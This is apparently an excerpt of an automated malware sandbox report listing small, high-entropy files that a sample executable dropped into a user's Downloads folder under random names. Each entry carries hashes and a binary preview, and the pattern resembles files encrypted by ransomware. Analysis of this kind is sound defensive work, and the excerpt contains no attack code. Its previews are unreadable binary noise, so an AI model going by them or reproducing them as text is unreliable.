          SSDEEP:24:MnphEnPuKquWhQzCRDrEZOGd0mlF0Br+OyjaCMJU4XADn+zGndM:MnpGuKrWhWCR0ZHJl+hIRAu+KnS
          MD5:699FAF7E1D2E5F8FD64C2138B86CCE3F
          SHA1:D545E7BF0D06D4815DBC80D2931C64262AAEA757
          SHA-256:5EA0586F67E7740A45C0A03B3DF4F344A16124513C1469275EF2FAE22B81D075
          SHA-512:FB21E62FBCD422FE05DC3BF93A3EA9691D5B07E199C695CB96207E93D0B7511D930755A0D72983F9EE195AE1A19433446AAC2207C161D9DEC7041365C47978CB
          Malicious:false
          Preview: ...PK....M$.N7M.:.'.`Ej.......7.....*.q'....z!..0N...)..h.=.....p.%.....g.....s.[{x..q..ti.Z-b.H..v../.7..o.......!uk.}...Y...}N[......Fra\.a/..|.G7.H......`...?..u.D..L......W../...IM....'9a[.rDY.e..k..r........=........f(.n......z....2 ~.g.!7bD>k.M.2;..J..Ull.w.....7......i..F.....4f..].....G(.....G.iW!%...2..y.+&...f).>.#y.O.cH..>..!c..].NH....c.+H.!..%@"!..ie...kn.......@.).A%...P...0............5%.......5..:\".Z..K.xZ..`.8.@._.C.{.M.....z....2\...-..\..'EP.d.[...Xa..|.k..f.^...T..Fd...Q.BF.V.@&..7......li.q.9W..K.M.L.....!....u..]T...;R..N..a....+..9..:4....ZB.Hf...SX...z.W...q.# .GC|^...v6l.-....x...`.Gc.........C.....H...{.].........x....../...."..n...&3.....Oot.<.y-.^..0d.%.o...X.fT.Z.6...9.....%Kb...D[:........,$.@z.....wr..M..;Y....WyT..l.>....../.^.>.\.^..i.%..7\;.Uo.V..$...O...0..D6r`.)7.+j..../v.....y.....dz...~.\j...99.........b.w40....1....`."v....h...e.ati...]...-....aO>..w.K.>MbJ6X....".0_)A.L.*!a?......5. ..K%.q.....L..U}.:6
          C:\Users\user\Downloads\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844383964940028
          Encrypted:false
          SSDEEP:24:UoVhbrWr2+MNScm9wXYtcn4OrkUr8D7+6TWimAP/OlXADn+zMN:XVhA2K9y/AUi7+IWmeu+2
          MD5:FC3D1F58514C6819CF08B4014E8B9F33
          SHA1:7F6FD40F53B2266FDF09B9D79975C52C27F4C50E
          SHA-256:14C97426D6B7AE856D62E9CB943A0A345C622DF30420E8F3504F5C01C87453EC
          SHA-512:3EEDA8ECCF728BD312F0EF4C718BAC924362052FF2DF1BEB0619FF7FD780A4B0CB38FE626E19034B552DABCC224BD50616B881B8E8BA8CE19EFA3596C90F2B73
          Malicious:false
          Preview: ..n....=xM.g....v>CJ..vR-.....k.L..;Tz....H.I8.$.h...].K.A.v.q....?j...{w...w.Z....]..h.kV....qDZs..........$..q..W|V.J.Y..?#N..3.r...<l..6 H..f....s...t.v......Bku.,...f._...!psq@./.0....z....r.K._.^......!SE*..y=h..s.4.w7..Q.:.PZj....(.lVk2.8...Z.....x.=..Qm..K$n.!&...>7^..j..4...@...ll..N.O~.D..S...)[..I.........P.1.P\.b....v1....#zNw'..Kt..<...#.$.....o.7r...Q@5.t^..(.........-.W.(.>........t..;.3.:..........N_.'.z..a..e.....V+.........Rg.$.L..1x..4...R.....2.#....z,aN7....d?....T.$..I..d/]..(..y...K...L...mGY.i.s.rx..^..J.N. ~ |O }.%.,.o.o."%..U.m#.eT..b=r.u..M)...,h.. ..'?Oh^.oK..B.W.p.lo.J...X\.#g.d..<..z. %0R.x#..x..L.'&...r.........#.8.+4S.w......X..'..P7.3.`|....4).bB_F...%a......a.x..{..^61z.=..XS..B.B(.r4p.UW....H....V.F......\...q.%.X..}e..N.$.d<......`..?y.....dZ.......7.2.Q......}.X.`J..rdNW.M..5hv.Q.z..h,.......A......u9g....$..+)..Ro.q~.R..`.....T...B.....pPs1...".TIP...Y$T1,..!d5....F....gL......................%f...
          C:\Users\user\Downloads\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.870004448665844
          Encrypted:false
          SSDEEP:24:QbcskvjVhFSgPJE1Lf17aZ3XPX/4rwZRLhQe1du2GXADn+zXuU:ocXhhF25tyHPX/3bLhQeHupu+T
          MD5:E2B0BD2739DC744F7809CE2FA4B8D7FF
          SHA1:F25480C01AF041F1B756507A3E4969A230F7BA9A
          SHA-256:4BD1EC8A54E9DBBE688120AB9D5450282D06E019B14E95FAF671AC3C629769B0
          SHA-512:83E08ECD295CFB09423E5AD41CD0383F1B5DC5B371D78A41E0813773A9B79AC06730857024E6C75A832221CA4D5B3AD3731D40847B40330F319D0CFC370C7AFD
          Malicious:false
          Preview: .c"..e(K.r...>FY.YjkP.\.f!..H$.(..W.k.n^..M...R......BZ...SD..O'.."^Q^eTZ..X....*14.kj..z.Q&.!.....m9....:..~L......f.R...#..rp...(C.u=]...v.@...;..'......l)b..9a....A..1.S.o...p..S.O....*.@.(.E...1.s....*P...r..#.4Y...f.0k...wa..g!.v.S..nst[Q.$.v.).F(#8..A`\6..,..[.....w-.I...<.v.g...e.......8..M$..@....s.+C.c......S.4+m.\.......^.Qph.1...bV...;0.1...k"mL.h@..."...`....;..*F$e.>..^a..T\?wSj..|I.\r.TSx......].f.y%.&m....TX.......B...K...{.= /qk:.............NN.0..D...jW.J}7.....z..W.,I.b&....#...v9..#.@..~q*q.>..x..U.?a.WY... .i..d.t6..7..YK..[............c.:&...H....}!l...E+...o.C..l.....U..3.|t..]....2}.....1|olG.mFR....0?......vr3..'~.T..G..........:N~;z..@..ri.&wE....Wl.P..R_..5.........y.p..}..9.h'j.../M3. A.i5.G..X_...&G..a.?..J$o....yx.(].?..m}vr..V"..^.0_!^....e.(...XX(....%X.....4e......h..RMG+k...f..I.x...!d.<D..|..L..K.krj....P.d.!|OG..|.J.....A.o.4nE..Nf.TEx.....s0...js.......e....f.[-..t.h...(.(.q..|f.!}y..._t...(...:~v.4
          C:\Users\user\Downloads\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.852645516056604
          Encrypted:false
          SSDEEP:24:5SrdajFBMqmdXzEO7prucAtQx2l5wi/c/r+QYfVpV4AXADn+zUY4:5SrdgUVzt7wcJ2lH/cwu4u+C
          MD5:D7689F679FDD46B8EBE4F3C18890FA1C
          SHA1:C9B879AFCA8F382BFB5174E9944A64638F7FBCF0
          SHA-256:552BA4DC1B77C3E2436D129357A513EE815B01C9210A050D5F7BC491A3B69D25
          SHA-512:4F99CB65E2C7810A186E917C3060C0B12810087B53651F5C852597F1AA51C7959906BB9693365395B44A09F438C0C93DFA7D304A4117AEB58835988660ED30B1
          Malicious:false
          Preview: .........v......[.....?2.pT.,..o.9a.P..8.....[T.a.zX.(...i>.?....2.hO.Mu.)bp4..rC...R.*1...Z.X.d....:k.z....2..z...........yS..'.J_M.r..-.!{....b.+.w..+....\"."...T.t...BMpr..6L...-.7s...-.%.....~F.]nE.(.w.y'xbAC^i...1..wd.;.Jr(.~[u&cw....."w..B-..Z..f..t.....Ad.\.YO.....$T7Bu.x...."....Q.\8ok..............T)........1.>..k.[o.........D..e......Dp.c.....M..?..W.vG.hZ(....<..^6Y.>..oY..R....`..m..-6?Bz..>.1...&...~y[.L..........9.rR....vVN?$,}.B...a..3...5...d.~/..8%.....u..5... $.s.|;..d.N....]..c..bQ.*..$'.C.E.n..P..u.:[\..l..H&.....5E.........1` .F[....T.T.M.xt.U...O.J#..D-...6..y."..F...e.-.......C...j(.R..0..W...F.86..$h8.u.).M.'.......\.4#.........c...f...g.2..)...}y.....l.w.....?I?... .I.8.%i..G#.F<...)..y$S;>._:....i".X...N...+l.<..2N{...N ..../..`.D..B.....DK.Y.o.! p.%w.S.......@..(.}..x...k%.s..a8>.....Bs.F.....j.......$...H.....U"\..|.2l...tp..~~.5*q./,..m2.O.....'.....ZP...9.d:.v...J.........=..?.-r..i)T.9.C.2o...4B....7.2g.o.....$(
          C:\Users\user\Downloads\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.838422192480398
          Encrypted:false
          SSDEEP:24:RYH/IuUu8j7KkxhTIvJo9YgJdQP+YiAiXxmKWpkJi5hd6J5pXADn+zz6N:Luehsx+rUPAAiBmKWl5u59u+i
          MD5:30E9E04D8BE03C5661CE35458E1495F2
          SHA1:793BF9E000B0688E86A89A873B1D7BF95778D5CC
          SHA-256:0A092CA83C0F5AE6A57923CE45F3B3120B4F21AF8744AD32DF9D708A62EB98E9
          SHA-512:2A9B2464E8FB67511C1F790E3A028FA1BD00F45283D6BBBF5BC73BBDA623B58396EC6049299ABDC9C4CD1E61A941D81020B193144688304BE0635BD0D20FDCA7
          Malicious:false
          Preview: ...D..ge..!n...s.83..~.c]._.m+.Ws_R&....#j.D....U......2...[..2.J.=*.fH7.......h<..7..k.....|.G#"......n..S..F^.|......d.3..{.tE..L......w..t..H.OQ:....4..BN.h.{.p.O....#a9..v.`...`r.M.&|.....u......_.Y...Ni..I.......m.e..um..2:.[.......Y...F#.u.*R+...Yp....&.@...-....?.@.F.\...m...!;...DW.+B.......a]]......-.(....B.-..f....:s.8r4.|...Y.W...-....!.....wb....<.*....LE.[.......\.2?....&.2m%<}.....y.R.:y.OJ..*.D.l7.D<...E........hEpt...5..l2e..<....J.....c.....i.JIZ.C.&._/.;^g..8....]....D..i...........W_.G.u.v.'O6/..2_.h....m.....KK]"....^=._.n3.;.@vA....Qp.....M...T.%..m....l..0...&Y.Q.....^.."...`M...;...F1..........5y.G.x{&...z.:.D:.=z9nVZ..7...F....Kl.i..wb.^...K....=]U.....!y...._..\.S.....?..".#....^......$.v&MG..C<q.:*...5!....r.\....]0.d..6..../....w..SG.]..;<..Og.6'...1T...Uq;..........9.'...6'.# ./..$.A...hv.....n..mv...oK... e-.C.+...@.X.A.s".`...........!cA........Y.g...0.l.Lvs.q.o#\e\0.........q%Hj...6.<}.].*.f.
          C:\Users\user\Downloads\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.836915682702806
          Encrypted:false
          SSDEEP:24:nMMikZSZhkkOy3ZvboCsJ+IllTati0c06M+iLTxBXADn+zTQY:OkAZb3Zvbkr70czMFLbu+HQY
          MD5:20777B72B48417F5443E8A77C9E63C23
          SHA1:5C9BDAFB7D2159A9C6614A784737144F0377B6AD
          SHA-256:E8FAC586F8CB0967D8F9F1069E268D2FC15E78E17ACF332E9AD0F8FABC35351E
          SHA-512:05EB635A451FDFAC3A32B00DFF65E3F170BE89521CE3F772C00350A297B38141881D698C59C7C2ACCC6F99B18654114DE368D8149C53C244BC23A3B94F55AFD1
          Malicious:false
          Preview: VMN.a..Q&!ql.....T......rM...e...F..HYc........v.5...%-#U......V..`..2....X{..x.n.F.E..Y...>..Cd.H. ]..)UN`U..[L....l....YGc4.A.V.).*j...H_..P.^...%k....R.%..r.r...n.9j.....:)v....Vi.5...C..yF..xN..32R>]~k.m....!.3.._.m^.N..?b5..}.b..I.......T......q.A.n....A..)._zL...Z.......-.......~.LC.q.k....JX..M...+....*7.y.....x.>9>s.....7P.}.....R..".#.......V...v.'.D.F..!C..RQ..05...@...U..k4J.D[.z#iz.q./...AP.Ou..S<.b..#.n....#..n.....w;...(q...=1X...Y..n.k-.`b..R(SA...'.F...N.. ..; -+..9.AAs._.Z .X.-&..........0.....t..Y#.t~..s....~.c....u...iE...9......I.. ..}.}({......S#Q#.C.....,..pw9Q......p0..[.....G.?...nN..zAWM.l......r.r..@..Z}...z..fV.Twa.S.....{. .I].....@{..1..;53WF......c....x......2..G.......f.\.H......>..i.w..)...C.*.eIbw..0..D.T...D.]....?aA/.S.+..1A.....F...hj..M?.;..n..../a .L.k..I|./..y.T\...|Ze..mI}.E.hp.......5Y:.30'.T....J....IJ...M ..M.....a.k..6eE....MUP2..m...-..*./..B2.a..^.m.E.h\r.."_=.CI.P=.3<p.f..-'~.v.J...s....)
          C:\Users\user\Downloads\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.850194716225468
          Encrypted:false
          SSDEEP:24:ztbpZA9pRtuPIGYMQOOzrsMjfTpcmepl6Inh17W3+1lObG6ggdJmdErLXADn+zD6:K76QGYPxnbVcmsh7bgduErju+HZM
          MD5:529D10EAC901E8473D84A8FC23E43503
          SHA1:313F3BED8AF3C444DF77AE81D06138430419CB61
          SHA-256:21B5A12A5A0382BFBC5EDF84F8A55B6B1D88795174DBE0EA67672420D8989E81
          SHA-512:C61405ACACF6A8BFD4A851D350E1FAE5AF527E7248CE3B2B162BA242D803EC2AC9FC3B262F7AAA8094220FFA8FB35C71146E711637AA149909E86CFFC76EC9FE
          Malicious:false
          Preview: .H]....Z%.bl.:.......t.)s*.....,&.[X=..zl.P3.`.&.......<.z...z...s<.7......2.n..0.....] 1....<Y.....Y..R.t...*.N.....`r#a.....Z{.....L$.~..b...K..v..I.Pv...M.`...q....u..{..V...Va.E.-.n..9.q.]..q4...2SH.+..g....;2Y3.7...6.2?G.#(...=.<..A^.s...g.:._.M..K..).......O%.@.....w.T.....R...e.[Cs...k...l....&/....T.....y....X....(...(..w.9...<.8.Dh........P.....]........a..G.r@.\ea.+..8...O`b...*....y}e5..5...^k..'.....=..2...#!%.p.....qn`..L..........J.|..h.z"...e.....h......&D...._...&.xG.......R$...XM.i$...v.:...wKA+"....=..0.<G..4.R../..f...@I../V...u.%R`....;Gb..?71X.DX.YDwc.......]!.+m.5.2...<WE..EB.z.1.r*wc..TL+@A..o..=D..W...P.f.i..]].o d..9..?jw...{T.S..1.;..+y...jBR..I....z.:.D...:.c..A..L.....f.z.45*..Xj$t.Y..........$..c.an..x.,.\.k._.d.J-..N.-.K.$.$....VnV..&...h..2.TYv....JP.....*1....+.B|L$/.:aj.*;..1....r.8...Y..c.[,...............K.e..s.L.M^.......!.E.....:.Zh......,C..)...#.5..@V...m=S.z^......o.I.....A.q..&.x.JWxw|......I..+tl
          C:\Users\user\Downloads\SQRKHNBNYN.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.846262768804879
          Encrypted:false
          SSDEEP:24:V43Ovw4Y7O8ORrXDa4z2pts5SC1hyZAXXADn+znn0:V43O/rBRrXDXotso/ZIu+A
          MD5:D4402A6BE3C66CD3DDEF8D28B63AF152
          SHA1:819B579F40709A6C2FE600430FCBA9B7FC500F6A
          SHA-256:D2AAEF33ADC37F30FFB0103E5C96495414D41F2999BA20468BF67B0E3A899B81
          SHA-512:89B6E7F9A3909FBD07759980121A18BE456518C8951BC2B4FBA26340878294E26A95C1BDC0FA295067BDA9C3D558F28AD8A5A75090CD409078017BAC121CAC89
          Malicious:false
          Preview: ..SXP;9i.8g../e%.YM.P.$@z..n6o.y.u$.+e..)...K...t.R......k...>l"..G...u"..x....&2..F..V...b..1B.. >.SH....+...<K..Sxq....."GAd...M.8.olTa=..EF..dJHl...j.....>......._.C=..r.y..5...u.[..Y..t..-{....~.M.....J.}:z..-...d.Wwn=~....x..:...,...........Y}..h.2.!..k..:.bu'_...I.5.......3*....q.?......$..E...ek..mq!.}..;......8ee..km.%..p-.yP......+.#.:.[.r.HV/N....?.....JP.I....xa......d....e...5f..k..^s7.!.7....*....kg...10`r}$.......2..o5..G..t..Irt....T.)....w.q..X...........>P']..WEh........q.)v...[J{Y../.m..)gK5'.....g.m..._.r;$.~.zaW...c..Q]w....K.0 .~...........\A....v0]a...Zn1b.F;j9.H. ..kEe..4...%+..H...v......z....2... l.. ..".rt.i5|..m......>..}.r.B....E:t.s.0.....d.._..p.qh...CqS.E[........}.~..-.h3#.m..hE9|^.P........&SI.5.8M81.r..U..W}.:Y9.Q...b...ln|..)FMl..o.|ZXb.p:G.HP.=.M[Q.D.*\.a<..., .V.,.8M..L.N.5.2:19.b.6m.%. <.-.;u..y./..ju.zh.:.....U.@.........t..@\.FZh.]I.%]...E..}.......}...q..b.j.+n.SK.*3....+..j.....n...
          C:\Users\user\Downloads\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.855938431017953
          Encrypted:false
          SSDEEP:24:0UlEy3G4SHNDDW558+IRp3Pjb02VxbBihBrWhxn5LZATXADn+z+H:XXTSHOItLghZWr5LZA7u+K
          MD5:2086FEABADCE80A7347BA3BE4FC02583
          SHA1:754402DA4F52FCE10B6773916AA08BFD27599B0E
          SHA-256:EBB645C97E304B3114FEAFCF027355402E54659930E38DA6E81293A5B8409AD8
          SHA-512:4FCF73AAB9B76350973B7B0A3D7AD8FB4B63F2E3DD01A0CA632745090D4F93B0ABD36EE96CE36E6803E64F2D4DAF09D4A17C55BAE3B3895EB40086166BF2152A
          Malicious:false
          Preview: ,..rc...w......p..R...>s~.).|yh.....J...3.,.....<..m?"..J,).....?.&I*:h.....Qr..T...3<7......S.(....t.-.S...(..E..M.s...o.f......t#2.m=...........`j..c..Y..6.....X.t..jq..QdzL..".<.cz.....<=.5M.m...M:7..].M....t8.[{;.Z..`/...6.UB7.w..#E.. .....2.V..$.H...}.b.dm=..vB...O...Wg....tQ.e.....P.....7.....-.......!.....!z..C[....o+.+p}c.;.}`.&z....W}VW=E....l@.....\..}.5..Z.ZOT...G.49...K3...W...w;.~f.N..."A...8.W..SHuo.x.....Ag......b...L........d<g........pNk.......A...a..RM.d..".....4...~...M.k...O...A.[!.g...0K.aU.J.. ..'..=...8e..'6s$U..Aa.U...;i...*c|8.!...g%Z.l,.....5.....+^.......j....E...$'..d.j.....%W...%.DgwR....{..G..|..qc......;O..N.l.*....D.0-.O..1.T.......Y.!6...y.U7...9.V.R..Sc..B.J..foN.c.Y..g`...1.t.F.6.....v...........w.`..EQ4....N.).:.y.w..5*...........4G........\.z.T......-.... ...........V.*..1B.|u2tJ.9..F.E..p...hV..]zq..J2.../.....K.D....e....rr...`.R./.J.T....).k.....b..k.Z._.....A.e..q0~.}.,.K.}^.^.".7\...
          C:\Users\user\Downloads\UOOJJOZIRH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.855554587655505
          Encrypted:false
          SSDEEP:24:9c4vJU3aaQfhcAeBsvxdG/M0ujbo6gRv1UXS/f/oqXADn+z4I2pM:7B4ccDMxd8M5vli/H7u+SG
          MD5:CCFA85E140C4070D801C28ECBFD6BB19
          SHA1:DCCCDE698EC25286B8EB803AF4246FDB6D2EBFF1
          SHA-256:6BC8653017EFB01461653481A111E5067E5F629BF3DA95E87CB7BF0EEA779451
          SHA-512:A6B7F3EDD5DB24D39E80C87DEB40EF3C41C64273BFFE1003C0FC584F190479522120937E62C98298A62F584417987FEDD51C7246BEA2CF27C26FA892F58538CD
          Malicious:false
          Preview: .T..u...UA!(9.*.^:1.J.Z+.#.........wo.T7....f.=...p..Uq~..]...X..5.Fb.=.!....H.........y.t5 .W.*JZu.....%`....6l-.'.#..-.=.I/..3....~A.-<..i...K..!.Gh...VD..=.GEf'.....+o\N.......0..p....HA....~..../.M.U.....t.....!.'sy.<9.@.>}........qR...oB..:....n.O...2.....T$....H.R.-...i:....c..l.3v..CL.......>.:....h..Y.ASK. .H.mNs.e.3h..%7^rz../...,.....s.5B.F...W..u.^.V..>...Wz.....<.N.zd!%'....>a....Z{.?ky...'.U.....N.S7......%.!...9j.V.?.l..h..p.......b....C>......M2.....*...No.@....\....7...!.^^.Su...)....fDi...[.k{..2........KL.....*.<.I\...+..q.!.N..[{.....k.".....j.3./..j;_.]-%....)O.^x\..zq...MP..N./.W...4.a...R.dR..a..on..H...o?.e\B..R..e..w... 5.7...V.......A..5...........V#.%.....Y&.s.3.Z....8...s...\......?45q.fl~.e.4.\.l.....mxP.xn].$.c......^..G.J.8.Z...vHD..I.....+....T....4..k.\..+.....Ul>. .`~4....$...>*}3e.TGys...Vx.]y.........dI......$..yf......7Wer...v....HbLc4...>.x..C]........Z)...3<...U.U=.n{..*...E.AL.@5@..o.*.
          C:\Users\user\Downloads\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.823789078231776
          Encrypted:false
          SSDEEP:24:26seSKQvk6uavF7+EX2kjsfqkAB41UHP/ypkEbq6Bpziu5w9YXADn+zx5e:26seAvk6uhMtB41UHXsbNvagu+6
          MD5:1CB2795365224958FC713E8A77965004
          SHA1:DA38D47C902950C1DA289985CDC859783080E459
          SHA-256:E851DC750DDC4D1221D58283201A27570E34C55641807D6E149E04243C7CC447
          SHA-512:518EB9AF758A2DE4F6340F7CAEC2DD83715D83191600825FBCAA22317F24C3D72EC1717B8B39CB0BA54958E474785C72B0EC2579F624841700E402354A198B27
          Malicious:false
          Preview: .1..6.....I%.R..6.)..'.cW....@.\U...:.}?..4l..X.......Iu..:..W.W..Au?..(..k].2U....U........].;b?q.<..z..T67.8.24...Q=T.{...5..........5.+. .W._%..~|!^.PX.3wm.F..V.....m..+J.?}.l....G...x.......G............e&o@>>]..o.J5..2..?.'.k.^...%..&.M}...QRP\.....,H.|E....!{.....0..y(..q\=.9.....H..[...Zq..T.F.cn!.......FR.t'...\s.........}...?......*=.)u. ..(c<.Y..P...]...o..Z'...(..........x..}j.Qj.h..IU.p.....,[.u.x.0{X.m.cr.eI X....Y.h...'...X..9.\........=.x._.o..y..Z'v1v.....r.Rn...R.b.......S.1C..f+...-......``o...{..q....?F.v....q.!"./mSj......AQ.I........g/..MbX...E.Q.zA.yw-.\.=.j......."QZ.;..sQE.j..Bf.....Y....i...~.."..l-...,.u...@.&G....sF..w..Q &..f.2. hD,.mjw"`...........o.j..s...E..........). c.P.p..(...j..........K.NU...!...`....wf.n....`......4W.\[...4q7..Y.b8Q.*.;I......q.;.|".....`.`M.4...[,:..e...@[`K.....6.....~.f5.t.#)i....H./s<f.X....n.'v)&f...[...e.@.......>...*5..%{.9N.i.E....IU..P?(.*x'n........*.E,.I.Inq.U.k./....]V
          C:\Users\user\Downloads\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839863986070048
          Encrypted:false
          SSDEEP:24:FQtVapH+rX/N9aBbSi3NOjkVorY7VuKY/snK1+oAxpXADn+zB:FoUpa/N9we+NOYSrSLns+oUu+1
          MD5:006DEC40E7902BF4E6F725FF2313DFF7
          SHA1:B0A3CBF8D8114A50171208EF885B74AA260F912A
          SHA-256:C4EFC089D8C0FC85C6DC8E6E8EBB12C3D2E3AB11AC3AC90DE1923132A47A09F5
          SHA-512:5DAB49B26E32A21B9E746BE16A0DD907E1462202CFA54728449231922DEED02FFD174D8F77B1FB5AFEAB2545281D0D7A95EB25ECDD901B4A505E5432C28D6F51
          Malicious:false
          Preview: 7,.*w.oJ...k5.-..2J2$.......@Xl..3....)o...S|f..n$...B}.a.........r.....Jh3\.<.8.W2....Zq....?`s.L~...[E.h...R.P....]*....)..`....x....9.._.h...2e..R......N........^e.S...(.P..k.~Jko(..3..<x0....y...uR..F>amn..!Y.#..j....~O..(}.._(..O......!)A......C.<>...]...(#.zE...R}..[.Lq..s..ui.B..].."..:.).8[..6....C.O..%d(..2M?j.Eh!....J*.ET...R.....)....Rk..A.j...$..!..|.1d@.y..q.|..G]..0%..um@.vY..Sq.'y..?0v...?Y......3......zv<....+..6...1...:..X.r.X....}..3.B@U;d0sb....nNv..O*1ZZC.6.......O.$.J..K.6d@a.Q..._.3K.1..GC6l....5U.r.e`..7r..0y\..;_.;.......c.=2~....7.a.."..Fh.......l....W..'...E.y.=.X.r....U.....Pkxp.+...>..3..@.J...=!..... ..4.!?;n.V..eb.^[...4.U.Xt..N{....0...W..X.DUyX ..@.=._..}.....8F...).x..b......hl.k.........D*..s..V....#....mA.....,.,.'....g;P....o3A.e..?..)..K...!f~l...84dR....f..6..Jcff. ....w.B.y...y.....z.e{.......F5.0.....v.T.*;.....Bc.y...S#+g2P.&...a..2S.\(..2I.....!.!?aYXN.}r....yR3.@.v.-..lB....i.../..l.l.:....wt"
          C:\Users\user\Downloads\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8402944584634655
          Encrypted:false
          SSDEEP:24:JSzv+hW5z59QCLOqGpn0qW2VK60Js35chvFhBNOvWXADn+zdA:K159QCLO9OF6Ow6nOCu+G
          MD5:6E4CBC34CBA714D60945026A45FACF28
          SHA1:50AE73F7D6D3EED6A9BA75854B968653CB27203B
          SHA-256:7B5D197DB8CD4A75C73056CC857A2ACC2C5A45CD862C7C19D42D8C45191DF1F6
          SHA-512:C5C4B7ED46CF57B147DD421962A247CA50F148EC68A4634EEB512E2210E9B6AF11B7FE457B045DB366F6968529CD1D7F62F1F4281C0322088EA64C86D3614909
          Malicious:false
          Preview: U.>.k..bb.r]%k...\I....d..c....%.N..'?...QE.o.'N^k....*.a....+....X.zL..v5}0..7.Q....#.P..y....c...k........r-....[..w.....0C..8.i`=q..R..I$.T...X..L.M./.CumM...x..%ER.....L(...u...m....z...(}.......Y..I,.+...7..Q4h.=.n~.]mMy.[.b.c"uu.Y..?.......<,...<<S...@l.qH.1f.n..;...]v.Q`!{. ........~.[D..]....4........)...ps..}..Yx....z8..............B..X.....|b;.b....$..a7t...B.}.L....R.....h.B+.....U...#?eW.F..y.x..L7@<...v)F(.~..Z.`...lk`n...<.x......c....i....0FS9ec.....j........i..X.P..).........I............t.H..PB....?Y?...z.U......{...J....o72X.&..;x.Y..7{.'..&...tg(...{..{6b...........(...uE...JS1(....=6.Gy.)...)r...h.7..t...,P..Rb6.^:...\.S^..O.!..."\..i.GOq.u...~.."..`.0...'z.q.R]...d.I...p.3..V.<6)<..1.X...y....Q..Q.)\.^....-t).|...k7..6y.....>..k.....@.......k........J.Gx3%.L.)&..x..t.E...R...}]*.Y..y..G..O.....6....{.5u.+y< ..^.......e.1...a...6c_...P..j...c.U........4K..C.SR.......]...cJ.?u#....7O...1.uw<..".Tt4...j).ri..Go
          C:\Users\user\Downloads\VAMYDFPUND.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.838275114499407
          Encrypted:false
          SSDEEP:24:ePiEYqplAKAg23R4rxISMShGpXW5+viT5i40XADn+zr7y:epYglSpBzj8Gpm/li40u+H7y
          MD5:3898B971958103CC70F37DE2113FB146
          SHA1:717EF592335C5FDE230D18EE9A0726A5DBF06665
          SHA-256:968C38CDF8E4415CAE213620D5505139E7E2AD9E784DADC110962DA6E7BC1EAD
          SHA-512:631D33384FA6B6CDE99B334D0F5945D8CF900432E68DD5C4D6280A841C5C5EA782ECC51F975C004BE830D592EC561F9B67F71DBB25E42F9BC3F28801097AB23F
          Malicious:false
          Preview: z.4d..N..mwe..;.;..V....r .3pZ.M..K....zF....n.v.}..X..+.;...\.'.\G...q... ............X.....(.....p..e.8....q>FIYK..4.....fk.../m.^.E#..O....e.l.....s.&..k..V.6.....?.H.$...e..3m.g..?p.a.e...N.W3$.:\$(s.1.j.wk..........CD-.....M2..H.1&..O8.0.Y._..jEI.p..Kf.<....f`.'Jcy.R@8./=..(....~..!z..^_.B..%..e\PzF....k..o...fad.Q.w5..<.......l.....X3....F.d.b`.....q+TB.F.4?w(.....j................l.X.`W.'.........,p.......D..?X0K.1.d..0..".4e..c...O..3....[(.TtBKqb0.E........"P..%....t..~.>".ohg.....@L..zwc...+....t2..E..C.........)."N-..@s....fx`....L:Z%...[......e...L..?H......z.....Phaj.R...}Fd.H..0(.._n./+.=x.]IeJY....=y(..6....D.&........JD.L.s.}..h.-x.7.......e.2*.I...3E...a.j(..D..../..i.........S0.Y..+. ...[$.l.:ib...^I+7..B.?..a.].)........h......."...c.T......};.K..m ....|...?y....{...2....S.m1.....u.V........C}...?...q%.Z....f...e...6...}5s..^.s#?.@.G.L.{.a;..Og.j..t..x..Z.bZb...m.,.e...5|.aI.gk9.x.5;...>...O.5Q7...e...qQ>10..>.l
          C:\Users\user\Downloads\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844832642432047
          Encrypted:false
          SSDEEP:24:9zGoVF5vmOwxhw3GBoMnEbuV2oT04LAmmKUHyjXADn+zpfwO:9zx5v1wM3SozbuVF0cA6zu+1IO
          MD5:E8C01643C552865A90BEFF49B4E72BE1
          SHA1:90A8EE1D249331DAE9E2587B57F8C3043A4FDF2D
          SHA-256:59AA1C7E0A66EE7D1D5767F9B11D85891BA38C0B3895CFB996826F931D119307
          SHA-512:22E319171A133C501F7B714DD86CBC4E3D6D2D4C446C47F2C1F297595BD42B91EEEED81D28669D837416EF1B5ADBA8AE10D5354A9B92EA4A301CAD31396D1DFE
          Malicious:false
